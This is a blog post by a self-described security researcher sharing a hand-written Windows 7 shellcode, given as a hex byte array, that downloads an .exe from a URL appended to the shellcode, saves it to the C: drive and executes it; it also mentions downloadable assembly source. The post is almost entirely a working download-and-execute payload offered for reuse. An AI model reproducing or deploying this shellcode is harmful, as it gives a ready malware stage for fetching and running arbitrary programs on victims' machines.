BannerPortlet

Blogs

Recently, I need a shellcode to download and execute an .exe file on Windows 7 for my experiment. However, there is not such a shellcode available.

Meanwhile, the download and execution shellcode generated by Metasploit Framework, currently, is unable to work on Windows 7, and the search on the Internet does not bring about desirable results.

With reference to the shellcode of “SkyLined” and some other shellcodes from milw0rm.com, I wrote a shellcode at my own discretion. And this is the result I would like to share with you:

shellcode[] =

"\xEB\x50\x31\xF6\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E"

"\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x67"

"\xE3\xEC\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99"

"\x02\x17\xC1\xCA\x04\xAE\x75\xF8\x3B\x54\x24\x04\xE0\xE4\x75\xCE"

"\x8B\x53\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C"

"\x97\xC3\x68\x8E\x48\x8B\x63\xE8\xA6\xFF\xFF\xFF\x66\xB8\x6C\x6C"

"\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD5\x68\x83"

"\x2B\x76\xF6\xE8\x8A\xFF\xFF\xFF\xEB\x21\x50\xFF\xD5\x68\xE7\xC4"

"\xCC\x69\xE8\x7B\xFF\xFF\xFF\x50\x4C\x4C\x4C\x4C\xFF\xD5\x68\x77"

"\xA6\x60\x2A\xE8\x6A\xFF\xFF\xFF\x50\xFF\xD5\x50\x68\x2E\x65\x78"

"\x65\x68\x43\x3A\x5C\x78\x50\x50\x89\xE3\x80\xC3\x08\x53\xE8\xC7"

"\xFF\xFF\xFFhttp://website.com/file.exe";

As can be seen, the URL is placed at the end of the shellcode.

Download ASM source code

The shellcode was successfully experimented on Windows 7, and perhaps it can also work on Windows 2000 and later versions.

Le Manh Tung

Senior Security Researcher

Leave a Reply

Name (required)
Mail (hidden) (required)
Website
Text to Identify
Reload-Capcha
CAPTCHA Code *

Popup Date Time Portlet

Blogs Aggregator

Recent Posts

Blog Category Portlet

Categories

Store Portlet

Archives

Vote Baby Portlet